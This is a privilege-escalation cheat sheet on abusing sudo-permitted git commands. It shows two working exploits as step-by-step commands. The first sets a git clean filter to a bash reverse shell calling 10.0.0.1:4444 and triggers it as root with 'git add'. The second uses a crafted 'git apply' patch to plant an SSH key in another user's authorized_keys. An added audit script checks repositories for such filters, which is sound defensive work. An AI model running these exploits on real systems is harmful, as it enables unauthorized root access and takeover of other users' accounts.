# Sudo Git Privilege Escalation

### Git Add/Commit

```bash
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"
```

If sudo lets us run `git add`/`git commit` on a repository as root, we may be able to escalate privileges, because any clean filter configured for that repository is executed as root during `git add`.

#### Exploitation

1. **Create a Payload**

```bash
echo 'bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"' > /tmp/revshell
chmod +x /tmp/revshell
```

2. **Set Git Config**

```bash
# Go to the git repository
cd /opt/example
git init
echo '*.php filter=indent' > .git/info/attributes
git config filter.indent.clean /tmp/revshell
```

3. **Commit the Repository**

Before committing, we need to start a listener on our local machine.

```bash
nc -lvnp 4444
```

Then commit with sudo.

```bash
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"
```

Now we should get a root shell in our local terminal.
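As an added defensive check that is not part of the original page: the escalation above works because git runs the configured `clean` filter during `git add`, so an administrator reviewing a sudo rule like the one at the top of this section can audit the exposed repository for such filters before trusting the rule. The repository path and the report format are assumptions of this example; it reads only `.git/config` and the attributes files and never invokes git.

```shell
#!/bin/sh
# Audit a repository for clean/smudge filter commands. git runs a "clean"
# filter on every `git add` of a path that an attributes file maps to it,
# so under the sudo rule above that command runs as root. Paths and the
# report format are assumptions of this added example. Exit status: 0 when
# no filter is configured, 1 when at least one is found, 2 if not a repo.
audit_git_filters() {
    repo="$1"
    cfg="$repo/.git/config"
    [ -f "$cfg" ] || { echo "no git config at $cfg" >&2; return 2; }
    # .git/config is INI-style: a [filter "name"] section followed by
    # "clean = cmd" / "smudge = cmd" lines. Parsed here without calling git.
    filters=$(awk '
        /^[ \t]*\[filter "[^"]+"\]/ {
            name=$0; sub(/^[ \t]*\[filter "/, "", name); sub(/"].*$/, "", name); next
        }
        /^[ \t]*\[/ { name=""; next }
        name != "" && /^[ \t]*(clean|smudge)[ \t]*=/ {
            kind=$0; sub(/^[ \t]*/, "", kind); sub(/[ \t]*=.*$/, "", kind)
            cmd=$0; sub(/^[ \t]*(clean|smudge)[ \t]*=[ \t]*/, "", cmd)
            print name "\t" kind "\t" cmd
        }' "$cfg")
    [ -n "$filters" ] || return 0
    # Report each filter and whether .git/info/attributes or .gitattributes
    # assigns it to any path (git only runs filters that are assigned).
    printf '%s\n' "$filters" | while IFS="$(printf '\t')" read -r name kind cmd; do
        assigned="not assigned in any attributes file"
        for attr in "$repo/.git/info/attributes" "$repo/.gitattributes"; do
            [ -f "$attr" ] || continue
            if grep -Eq "filter=$name([[:space:]]|$)" "$attr"; then
                assigned="assigned in $attr"
            fi
        done
        printf "filter '%s' %s -> %s (%s)\n" "$name" "$kind" "$cmd" "$assigned"
    done
    return 1
}

# Stand-alone usage: sh audit_git_filters.sh /opt/example
if [ $# -gt 0 ]; then audit_git_filters "$1"; fi
```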


### Git Apply

```bash
sudo /usr/bin/git apply *
```

If we can apply a patch as root with `git apply`, we can change the contents of arbitrary files.

#### Exploitation with SSH Keys

Assume we are currently "user1" and want to escalate to "user2".\
First we create a new SSH key pair.

```bash
cd /home/user1
ssh-keygen -t rsa
Enter file in which to save the key (/home/user1/.ssh/id_rsa): id_rsa
```

The new SSH key pair (private/public) is generated under **`/home/user1`**.\
Next, add the content of **`id_rsa.pub`** to **`authorized_keys`**.

```bash
cat /home/user1/id_rsa.pub > /home/user1/.ssh/authorized_keys
```

Then create a patch.

```bash
cd /home
git diff user1/.bash_history user1/.ssh/authorized_keys > /tmp/patch
```

After that, replace the name “user1” with “user2” in the patch file.

```bash
sed -i 's/user1/user2/g' /tmp/patch
```

Now we can apply the patch as root. This command updates the target user's ("user2") **`authorized_keys`** so that we can log in over SSH as "user2" with our key.

```bash
sudo /usr/bin/git apply /tmp/patch
ssh -i /home/user1/.ssh/id_rsa user2@example.com
```
